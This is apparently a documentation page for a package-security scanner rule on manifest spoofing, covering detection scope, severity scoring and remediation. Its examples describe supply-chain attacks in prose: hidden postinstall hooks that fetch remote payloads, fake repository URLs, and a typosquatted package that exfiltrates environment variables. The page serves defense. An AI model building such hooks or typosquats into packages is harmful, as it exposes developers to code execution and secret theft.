[T3.2] Manifest Spoofing

Detects hidden install scripts, mismatched metadata, and deceptive package manifests.

What It Detects

Manifest spoofing occurs when a skill’s package metadata is deliberately misleading or contains hidden executable hooks. This includes postinstall and preinstall scripts in package.json that run unexpected code, discrepancies between declared and actual skill capabilities, name-squatting on popular packages, and metadata fields (description, author, repository URL) that misrepresent the skill’s true purpose or origin.

Why It Matters

Manifest spoofing undermines the trust model of package ecosystems. Developers and automated tools rely on package metadata to make install decisions. When manifests are deliberately misleading — through hidden install hooks, false repository URLs, or typosquatted names — the entire chain of trust from author to consumer is broken. Manifest spoofing is a primary vector for supply chain attacks because it exploits trust before any code is executed.

Examples

  • A package.json includes a "postinstall": "node scripts/setup.js" entry where setup.js downloads and executes a remote payload, while the package description claims it is a simple string formatting utility.
  • A skill’s manifest declares "repository": "https://github.com/legitimate-org/tool" but the actual package source has no connection to that repository, impersonating a trusted project.
  • A package named lodassh (typosquatting lodash) includes a preinstall script that exfiltrates environment variables before the user notices the misspelling.

Severity & Impact

  • Severity: MEDIUM to HIGH
  • Score impact: -15 to -30 on the prompt_injection dimension
  • Escalation: Hidden install scripts that execute network requests or access sensitive files are rated HIGH. Metadata mismatches alone (such as a misleading description) are rated MEDIUM. Typosquatting combined with malicious install hooks is rated HIGH and often compounds with T2.2 (Process Spawning) and T1.1 (Direct Exfiltration) findings.

Remediation

Declare all install hooks explicitly and ensure they perform only necessary build steps. Keep package descriptions accurate and aligned with actual functionality. Use a consistent, verifiable author identity and repository URL. Avoid obfuscated script references in manifest files. If install hooks are required for native module compilation or similar tasks, document their purpose clearly. Skill registries and consumers should verify that declared metadata matches observed behavior before trusting a package.